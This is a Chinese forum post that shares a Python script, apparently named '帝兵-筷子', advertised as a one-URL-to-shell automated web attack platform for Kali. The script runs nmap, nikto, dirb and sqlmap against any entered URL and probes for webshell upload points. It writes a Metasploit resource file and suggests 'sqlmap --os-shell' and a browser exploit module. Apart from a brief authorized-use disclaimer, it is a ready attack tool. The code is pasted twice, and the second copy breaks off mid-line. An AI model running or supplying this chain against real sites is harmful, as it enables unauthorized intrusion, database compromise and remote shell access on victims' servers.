本帖最后由 Zephyr 于 2025-12-7 10:19 编辑
#!/usr/bin/env python3
# 帝兵-筷子 | Kali Web渗透全自动平台
# 作者: 跨紫大帝
# 警告:仅用于授权的安全测试和教育目的
import os
import sys
import subprocess
import time
import threading
import json
from datetime import datetime
from urllib.parse import urlparse
# 颜色代码
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
CYAN = '\033[96m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
BOLD = '\033[1m'
END = '\033[0m'
# 全局变量
TARGET_URL = ""
SCAN_RESULTS = {}
CURRENT_STAGE = ""
def print_banner():
os.system("clear")
print(f"{Colors.CYAN}{Colors.BOLD}{'='*65}")
print(" ╔══════════════════════════════════════╗")
print(" ║ 帝兵-筷子 | 全自动渗透平台 ║")
print(" ║ ONE-URL TO SHELL AUTOMATION FRAMEWORK ║")
print(" ╚══════════════════════════════════════╝")
print(f"{'='*65}{Colors.END}")
print(f"{Colors.YELLOW} Kali Linux 全自动Web渗透测试工具")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:仅用于授权测试,请勿非法使用")
print(f"{Colors.CYAN}{'='*65}{Colors.END}\n")
def print_status(stage, message):
"""打印当前状态"""
timestamp = datetime.now().strftime("%H:%M:%S")
print(f"{Colors.BLUE}[{timestamp}]{Colors.END} {Colors.YELLOW}[{stage}]{Colors.END} {message}")
def print_success(message):
"""打印成功信息"""
print(f"{Colors.GREEN}[✓] {message}{Colors.END}")
def print_error(message):
"""打印错误信息"""
print(f"{Colors.RED}[✗] {message}{Colors.END}")
def print_warning(message):
"""打印警告信息"""
print(f"{Colors.YELLOW}[!] {message}{Colors.END}")
def check_tools():
"""检查必要的Kali工具是否安装"""
required_tools = {
'nmap': 'nmap --version',
'sqlmap': 'sqlmap --version',
'dirb': 'dirb --help',
'nikto': 'nikto -Version',
'whatweb': 'whatweb --version'
}
missing_tools = []
print_status("系统检查", "检查Kali工具依赖...")
for tool, check_cmd in required_tools.items():
try:
subprocess.run(check_cmd.split(), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
print_success(f"{tool} 已安装")
except:
missing_tools.append(tool)
print_error(f"{tool} 未安装")
if missing_tools:
print_warning(f"缺少工具: {', '.join(missing_tools)}")
print_warning("请运行: sudo apt install " + " ".join(missing_tools))
return False
return True
def extract_domain(url):
"""从URL提取域名"""
parsed = urlparse(url)
return parsed.netloc
def stage_1_reconnaissance():
"""第一阶段:信息收集"""
global CURRENT_STAGE
CURRENT_STAGE = "信息收集"
domain = extract_domain(TARGET_URL)
# 1. Whois查询
print_status(CURRENT_STAGE, f"执行Whois查询: {domain}")
try:
result = subprocess.run(f"whois {domain}", shell=True, capture_output=True, text=True, timeout=30)
SCAN_RESULTS['whois'] = result.stdout[:1000] # 只保存前1000字符
print_success("Whois查询完成")
except Exception as e:
print_error(f"Whois查询失败: {e}")
# 2. WhatWeb指纹识别
print_status(CURRENT_STAGE, "Web技术指纹识别...")
try:
result = subprocess.run(f"whatweb {TARGET_URL} -v", shell=True, capture_output=True, text=True, timeout=60)
SCAN_RESULTS['whatweb'] = result.stdout
print_success("指纹识别完成")
except Exception as e:
print_error(f"WhatWeb扫描失败: {e}")
# 3. Nmap端口扫描
print_status(CURRENT_STAGE, "Nmap端口扫描...")
try:
# 快速扫描常见端口
cmd = f"nmap -sS -T4 -F --open {domain} -oN nmap_scan.txt"
subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=120)
print_success("端口扫描完成")
# 读取扫描结果
with open('nmap_scan.txt', 'r') as f:
SCAN_RESULTS['nmap'] = f.read()
except Exception as e:
print_error(f"Nmap扫描失败: {e}")
def stage_2_vulnerability_scan():
"""第二阶段:漏洞扫描"""
global CURRENT_STAGE
CURRENT_STAGE = "漏洞扫描"
# 1. Nikto漏洞扫描
print_status(CURRENT_STAGE, "Nikto Web漏洞扫描...")
try:
cmd = f"nikto -h {TARGET_URL} -o nikto_scan.txt -Format txt"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# 显示进度
print(f"{Colors.CYAN}[进行中]{Colors.END} Nikto扫描可能需要几分钟...")
# 超时设置
try:
stdout, stderr = process.communicate(timeout=300) # 5分钟超时
print_success("Nikto扫描完成")
with open('nikto_scan.txt', 'r') as f:
SCAN_RESULTS['nikto'] = f.read()
except subprocess.TimeoutExpired:
process.kill()
print_warning("Nikto扫描超时")
except Exception as e:
print_error(f"Nikto扫描失败: {e}")
# 2. DIRB目录爆破
print_status(CURRENT_STAGE, "DIRB目录枚举...")
try:
# 使用小字典快速扫描
cmd = f"dirb {TARGET_URL} /usr/share/dirb/wordlists/small.txt -o dirb_scan.txt"
subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=180)
print_success("目录枚举完成")
with open('dirb_scan.txt', 'r') as f:
SCAN_RESULTS['dirb'] = f.read()
except Exception as e:
print_error(f"DIRB扫描失败: {e}")
def stage_3_automated_exploitation():
"""第三阶段:自动化攻击"""
global CURRENT_STAGE
CURRENT_STAGE = "自动化攻击"
domain = extract_domain(TARGET_URL)
# 自动化的SQL注入检测
print_status(CURRENT_STAGE, "自动化SQL注入检测...")
try:
# 使用sqlmap进行基本检测(批处理模式)
cmd = f"sqlmap -u '{TARGET_URL}' --batch --crawl=2 --risk=2 --level=2 --output-dir=sqlmap_results"
print(f"{Colors.YELLOW}[注意]{Colors.END} SQLMap检测可能需要较长时间...")
print(f"{Colors.CYAN}执行命令: {cmd}{Colors.END}")
# 启动sqlmap进程
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# 实时输出
print(f"\n{Colors.PURPLE}[SQLMap实时输出]{Colors.END}")
for line in process.stdout:
if "URL" in line or "injection" in line.lower() or "payload" in line:
print(f" {Colors.CYAN}{line.strip()}{Colors.END}")
if "back-end DBMS" in line:
print_success(f"发现数据库: {line.strip()}")
SCAN_RESULTS['sqlmap_db'] = line.strip()
time.sleep(0.1)
process.wait()
print_success("SQL注入检测完成")
except Exception as e:
print_error(f"SQLMap执行失败: {e}")
def stage_4_webshell_deployment():
"""第四阶段:WebShell部署尝试"""
global CURRENT_STAGE
CURRENT_STAGE = "WebShell部署"
print_status(CURRENT_STAGE, "尝试常见WebShell上传点...")
# 常见上传路径列表
common_upload_paths = [
'/upload.php', '/admin/upload.php', '/wp-admin/async-upload.php',
'/filemanager/upload.php', '/inc/upload.php', '/uploads/'
]
# 检查每个可能的路径
upload_points_found = []
for path in common_upload_paths:
test_url = f"{TARGET_URL.rstrip('/')}{path}"
print_status("检测", f"检查 {path}")
try:
# 使用curl检查路径是否存在
cmd = f"curl -s -o /dev/null -w '%{{http_code}}' {test_url} --connect-timeout 5"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
if result.stdout in ['200', '403', '301', '302']:
upload_points_found.append((path, result.stdout))
print_success(f"找到上传点: {path} (HTTP {result.stdout})")
except:
pass
if upload_points_found:
SCAN_RESULTS['upload_points'] = upload_points_found
print_success(f"发现 {len(upload_points_found)} 个可能的上传点")
else:
print_warning("未发现常见的上传点")
def stage_5_shell_attempt():
"""第五阶段:Shell获取尝试"""
global CURRENT_STAGE
CURRENT_STAGE = "Shell获取"
print_status(CURRENT_STAGE, "执行Metasploit自动化攻击...")
# 生成Metasploit自动化脚本
msf_script = """
# 帝兵-筷子自动化攻击脚本
use auxiliary/scanner/http/dir_scanner
set RHOSTS {domain}
set RPORT 80
set THREADS 10
run
use auxiliary/scanner/http/http_version
set RHOSTS {domain}
run
# 尝试基于发现的漏洞进行攻击
# 注:实际攻击模块需要根据扫描结果动态选择
""".format(domain=extract_domain(TARGET_URL))
# 保存脚本
with open('autopwn.rc', 'w') as f:
f.write(msf_script)
print_warning("需要手动执行: msfconsole -r autopwn.rc")
print_warning("或使用浏览器攻击: use exploit/multi/browser/chrome_cve_2024_0519")
def save_final_report():
"""生成最终报告"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"渗透报告_{extract_domain(TARGET_URL)}_{timestamp}.md"
with open(filename, 'w') as f:
f.write(f"# 帝兵-筷子渗透测试报告\n\n")
f.write(f"**目标URL**: {TARGET_URL}\n")
f.write(f"**扫描时间**: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"**工具版本**: 帝兵-筷子 v2.0\n\n")
f.write("## 扫描摘要\n")
f.write(f"- 信息收集阶段: {'完成' if 'whois' in SCAN_RESULTS else '失败'}\n")
f.write(f"- 漏洞扫描阶段: {'完成' if 'nikto' in SCAN_RESULTS else '失败'}\n")
f.write(f"- 自动化攻击: {'尝试执行' if 'sqlmap_db' in SCAN_RESULTS else '未执行'}\n\n")
if 'upload_points' in SCAN_RESULTS:
f.write("## 发现的上传点\n")
for path, code in SCAN_RESULTS['upload_points']:
f.write(f"- `{path}` (HTTP {code})\n")
if 'sqlmap_db' in SCAN_RESULTS:
f.write(f"\n## SQL注入检测结果\n")
f.write(f"{SCAN_RESULTS['sqlmap_db']}\n")
print_success(f"报告已保存: {filename}")
def run_full_automation(url):
"""执行完整的自动化流程"""
global TARGET_URL, SCAN_RESULTS
TARGET_URL = url
SCAN_RESULTS = {}
print_banner()
print(f"{Colors.GREEN}{'='*65}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}目标URL: {TARGET_URL}{Colors.END}")
print(f"{Colors.GREEN}{'='*65}{Colors.END}\n")
# 检查工具依赖
if not check_tools():
print_error("缺少必要工具,请先安装")
return
# 执行五个阶段
stages = [
("第一阶段", "信息收集", stage_1_reconnaissance),
("第二阶段", "漏洞扫描", stage_2_vulnerability_scan),
("第三阶段", "自动化攻击", stage_3_automated_exploitation),
("第四阶段", "WebShell部署", stage_4_webshell_deployment),
("第五阶段", "Shell获取", stage_5_shell_attempt)
]
start_time = time.time()
for stage_num, stage_name, stage_func in stages:
print(f"\n{Colors.PURPLE}{'='*50}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}{stage_num}: {stage_name}{Colors.END}")
print(f"{Colors.PURPLE}{'='*50}{Colors.END}")
try:
stage_func()
except Exception as e:
print_error(f"阶段执行失败: {e}")
continue
# 生成报告
print(f"\n{Colors.GREEN}{'='*50}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}扫描完成!{Colors.END}")
print(f"{Colors.GREEN}{'='*50}{Colors.END}")
total_time = time.time() - start_time
print_success(f"总执行时间: {total_time:.1f}秒")
save_final_report()
# 提供后续建议
print(f"\n{Colors.YELLOW}{'='*50}{Colors.END}")
print(f"{Colors.CYAN}{Colors.BOLD}后续行动建议:{Colors.END}")
print(f"{Colors.YELLOW}{'='*50}{Colors.END}")
if 'sqlmap_db' in SCAN_RESULTS:
print(f"1. {Colors.GREEN}发现SQL注入漏洞,可进一步利用:{Colors.END}")
print(f" sqlmap -u '{TARGET_URL}' --os-shell")
if 'upload_points' in SCAN_RESULTS:
print(f"2. {Colors.GREEN}发现上传点,尝试WebShell上传:{Colors.END}")
for path, _ in SCAN_RESULTS['upload_points']:
print(f" 上传地址: {TARGET_URL.rstrip('/')}{path}")
print(f"3. {Colors.YELLOW}手动渗透测试建议:{Colors.END}")
print(f" - 使用Burp Suite进行深入测试")
print(f" - 检查发现的敏感目录")
print(f" - 尝试默认凭证登录")
def main():
"""主函数"""
print_banner()
# 获取目标URL
print(f"{Colors.CYAN}{'='*65}{Colors.END}")
url = input(f"{Colors.GREEN}请输入目标URL (如 http://target.com): {Colors.END}").strip()
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
# 确认开始
print(f"\n{Colors.RED}⚠️ 警告: 这将启动全自动渗透测试{Colors.END}")
print(f"{Colors.YELLOW}目标: {url}{Colors.END}")
confirm = input(f"{Colors.GREEN}是否开始? (y/N): {Colors.END}").lower()
if confirm == 'y':
run_full_automation(url)
else:
print(f"{Colors.YELLOW}操作已取消{Colors.END}")
if __name__ == "__main__":
try:
main()
print(f"\n{Colors.CYAN}感谢使用帝兵-筷子全自动平台!{Colors.END}")
except KeyboardInterrupt:
print(f"\n{Colors.YELLOW}程序被用户中断{Colors.END}")
except Exception as e:
print_error(f"程序执行出错: {e}")
|
# 帝兵-筷子 | Kali Web渗透全自动平台
# 作者: 跨紫大帝
# 警告:仅用于授权的安全测试和教育目的
import os
import sys
import subprocess
import time
import threading
import json
from datetime import datetime
from urllib.parse import urlparse
# 颜色代码
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
CYAN = '\033[96m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
BOLD = '\033[1m'
END = '\033[0m'
# 全局变量
TARGET_URL = ""
SCAN_RESULTS = {}
CURRENT_STAGE = ""
def print_banner():
os.system("clear")
print(f"{Colors.CYAN}{Colors.BOLD}{'='*65}")
print(" ╔══════════════════════════════════════╗")
print(" ║ 帝兵-筷子 | 全自动渗透平台 ║")
print(" ║ ONE-URL TO SHELL AUTOMATION FRAMEWORK ║")
print(" ╚══════════════════════════════════════╝")
print(f"{'='*65}{Colors.END}")
print(f"{Colors.YELLOW} Kali Linux 全自动Web渗透测试工具")
print(f"{Colors.GREEN} 作者: 跨紫大帝")
print(f"{Colors.RED} 警告:仅用于授权测试,请勿非法使用")
print(f"{Colors.CYAN}{'='*65}{Colors.END}\n")
def print_status(stage, message):
"""打印当前状态"""
timestamp = datetime.now().strftime("%H:%M:%S")
print(f"{Colors.BLUE}[{timestamp}]{Colors.END} {Colors.YELLOW}[{stage}]{Colors.END} {message}")
def print_success(message):
"""打印成功信息"""
print(f"{Colors.GREEN}[✓] {message}{Colors.END}")
def print_error(message):
"""打印错误信息"""
print(f"{Colors.RED}[✗] {message}{Colors.END}")
def print_warning(message):
"""打印警告信息"""
print(f"{Colors.YELLOW}[!] {message}{Colors.END}")
def check_tools():
"""检查必要的Kali工具是否安装"""
required_tools = {
'nmap': 'nmap --version',
'sqlmap': 'sqlmap --version',
'dirb': 'dirb --help',
'nikto': 'nikto -Version',
'whatweb': 'whatweb --version'
}
missing_tools = []
print_status("系统检查", "检查Kali工具依赖...")
for tool, check_cmd in required_tools.items():
try:
subprocess.run(check_cmd.split(), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
print_success(f"{tool} 已安装")
except:
missing_tools.append(tool)
print_error(f"{tool} 未安装")
if missing_tools:
print_warning(f"缺少工具: {', '.join(missing_tools)}")
print_warning("请运行: sudo apt install " + " ".join(missing_tools))
return False
return True
def extract_domain(url):
"""从URL提取域名"""
parsed = urlparse(url)
return parsed.netloc
def stage_1_reconnaissance():
"""第一阶段:信息收集"""
global CURRENT_STAGE
CURRENT_STAGE = "信息收集"
domain = extract_domain(TARGET_URL)
# 1. Whois查询
print_status(CURRENT_STAGE, f"执行Whois查询: {domain}")
try:
result = subprocess.run(f"whois {domain}", shell=True, capture_output=True, text=True, timeout=30)
SCAN_RESULTS['whois'] = result.stdout[:1000] # 只保存前1000字符
print_success("Whois查询完成")
except Exception as e:
print_error(f"Whois查询失败: {e}")
# 2. WhatWeb指纹识别
print_status(CURRENT_STAGE, "Web技术指纹识别...")
try:
result = subprocess.run(f"whatweb {TARGET_URL} -v", shell=True, capture_output=True, text=True, timeout=60)
SCAN_RESULTS['whatweb'] = result.stdout
print_success("指纹识别完成")
except Exception as e:
print_error(f"WhatWeb扫描失败: {e}")
# 3. Nmap端口扫描
print_status(CURRENT_STAGE, "Nmap端口扫描...")
try:
# 快速扫描常见端口
cmd = f"nmap -sS -T4 -F --open {domain} -oN nmap_scan.txt"
subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=120)
print_success("端口扫描完成")
# 读取扫描结果
with open('nmap_scan.txt', 'r') as f:
SCAN_RESULTS['nmap'] = f.read()
except Exception as e:
print_error(f"Nmap扫描失败: {e}")
def stage_2_vulnerability_scan():
"""第二阶段:漏洞扫描"""
global CURRENT_STAGE
CURRENT_STAGE = "漏洞扫描"
# 1. Nikto漏洞扫描
print_status(CURRENT_STAGE, "Nikto Web漏洞扫描...")
try:
cmd = f"nikto -h {TARGET_URL} -o nikto_scan.txt -Format txt"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# 显示进度
print(f"{Colors.CYAN}[进行中]{Colors.END} Nikto扫描可能需要几分钟...")
# 超时设置
try:
stdout, stderr = process.communicate(timeout=300) # 5分钟超时
print_success("Nikto扫描完成")
with open('nikto_scan.txt', 'r') as f:
SCAN_RESULTS['nikto'] = f.read()
except subprocess.TimeoutExpired:
process.kill()
print_warning("Nikto扫描超时")
except Exception as e:
print_error(f"Nikto扫描失败: {e}")
# 2. DIRB目录爆破
print_status(CURRENT_STAGE, "DIRB目录枚举...")
try:
# 使用小字典快速扫描
cmd = f"dirb {TARGET_URL} /usr/share/dirb/wordlists/small.txt -o dirb_scan.txt"
subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=180)
print_s
使用道具 举报